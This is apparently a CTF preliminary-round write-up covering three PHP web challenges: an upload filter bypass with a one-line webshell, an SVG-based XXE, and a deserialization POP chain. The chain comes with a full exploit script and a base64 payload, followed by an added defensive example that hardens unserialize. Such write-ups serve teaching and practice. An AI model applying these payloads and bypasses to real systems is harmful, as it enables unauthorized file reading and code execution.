Author:endowment
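I didn't do well in this preliminary round, only 850 points, and I don't know whether we will make it through 😫😫. Let's look at the web challenges first: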
Upload1
This one mainly tests bypassing the front-end check, followed by a short-tag bypass.

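Here the front-end check is bypassed successfully and a PHP file can be uploaded. After uploading a one-line webshell, the hint says "你也配用php" (roughly: "you think you deserve to use php?"), so only short tags can be used.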

Then access the file:

EzSerialize
This one mainly tests PHP deserialization; the chain is very simple anyway:
User::__toString()->Admin::__call()->FileReader::execute()
exp:
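<?php
// Only the class names and private property names have to match the target:
// serialize() records names and values, never method bodies.
class User {
    private $name;
    private $role;
    public function __construct($name, $role) {
        $this->name = $name;
        $this->role = $role;
    }
}
class Admin {
    private $command;
    public function __construct($command) {
        $this->command = $command;
    }
}
class FileReader {
    private $filename;
    public function __construct($filename) {
        $this->filename = $filename;
    }
}
// Nest the objects in chain order: User -> Admin -> FileReader('flag.php').
$user = new User('test', new Admin(new FileReader('flag.php')));
$serialized = serialize($user);
// Private properties contain NUL bytes, so the payload is base64-encoded.
echo base64_encode($serialized);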
//Tzo0OiJVc2VyIjoyOntzOjEwOiIAVXNlcgBuYW1lIjtzOjQ6InRlc3QiO3M6MTA6IgBVc2VyAHJvbGUiO086NToiQWRtaW4iOjE6e3M6MTQ6IgBBZG1pbgBjb21tYW5kIjtPOjEwOiJGaWxlUmVhZGVyIjoxOntzOjIwOiIARmlsZVJlYWRlcgBmaWxlbmFtZSI7czo4OiJmbGFnLnBocCI7fX19
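An added example, not part of the original writeup or the challenge source: the receiving side of this chain, unhardened and hardened. `User` is a hypothetical stand-in whose `__toString()` only sets a flag, and `classNamesIn`, `renderUnsafe` and `renderSafe` are names made up for this example.

```php
<?php
declare(strict_types=1);
// Hypothetical stand-in for the challenge's User class (its real body is not
// on the page): __toString() only records that the first chain link ran.
class User
{
    public static bool $fired = false;
    private $name, $role;
    public function __toString(): string
    {
        self::$fired = true;
        return '';
    }
}

// Payload printed by the exp above (base64 of the serialized User object).
const PAYLOAD = 'Tzo0OiJVc2VyIjoyOntzOjEwOiIAVXNlcgBuYW1lIjtzOjQ6InRlc3QiO3M6MTA6IgBVc2VyAHJvbGUiO086NToiQWRtaW4iOjE6e3M6MTQ6IgBBZG1pbgBjb21tYW5kIjtPOjEwOiJGaWxlUmVhZGVyIjoxOntzOjIwOiIARmlsZVJlYWRlcgBmaWxlbmFtZSI7czo4OiJmbGFnLnBocCI7fX19';

// Heuristic: list class names in O:<len>:"<Class>": tokens. It can over-report
// (a string value may contain such a token), which is the safe direction.
function classNamesIn(string $raw): array
{
    preg_match_all('/(?:^|[;{])[OC]:\d+:"([^"]+)":/', $raw, $m);
    return array_values(array_unique($m[1]));
}

// Unhardened: instantiates whatever the input names, then casts it to string.
function renderUnsafe(string $b64): string
{
    return (string) unserialize(base64_decode($b64));
}

// Hardened: refuse input naming any class; decode with instantiation disabled.
function renderSafe(string $b64): string
{
    $raw = base64_decode($b64, true);
    if ($raw === false || classNamesIn($raw) !== []) {
        return 'rejected';
    }
    $value = unserialize($raw, ['allowed_classes' => false]);
    return is_scalar($value) ? (string) $value : 'rejected';
}

echo 'classes: ', implode(', ', classNamesIn(base64_decode(PAYLOAD))), PHP_EOL;
renderUnsafe(PAYLOAD);
echo 'unsafe path ran __toString: ', var_export(User::$fired, true), PHP_EOL;
User::$fired = false;
echo 'safe path: ', renderSafe(PAYLOAD), PHP_EOL;
echo 'safe path ran __toString: ', var_export(User::$fired, true), PHP_EOL;
```

With `allowed_classes` set to `false`, any object in the input is turned into `__PHP_Incomplete_Class`, which carries none of the application's magic methods, so the class-name check and the option back each other up.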
UploadKing
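An upload page. At first I thought it was an nginx parsing vulnerability, with the file extension checked against a whitelist. Then I tried .user.ini and found that did not work either. The upload page gave a hint saying that files such as SVG and webp are allowed through, so I tried uploading an a.svg file. The upload succeeded and the file could be viewed, so combined with XML, this is an XXE vulnerability to go after.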

Then view the file.

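Thanks to all of you for reading, thank you everyone 😘
Good news: we made it to the finals, thanks to my teammates for their effort 😎
Ding Shen (丁神) is awesome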